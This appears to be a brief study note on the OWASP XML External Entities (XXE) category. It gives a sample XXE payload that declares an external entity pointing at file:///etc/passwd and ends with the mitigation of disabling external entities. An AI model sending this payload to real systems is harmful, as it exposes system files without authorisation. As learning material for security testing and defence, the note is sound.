A4:2017-XML External Entities (XXE)

DTD : Document type definition
<aside> 📗 Look for XEE payload
</aside>
<aside> 📗 type bypass can be report
</aside>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
Disable XML External Entities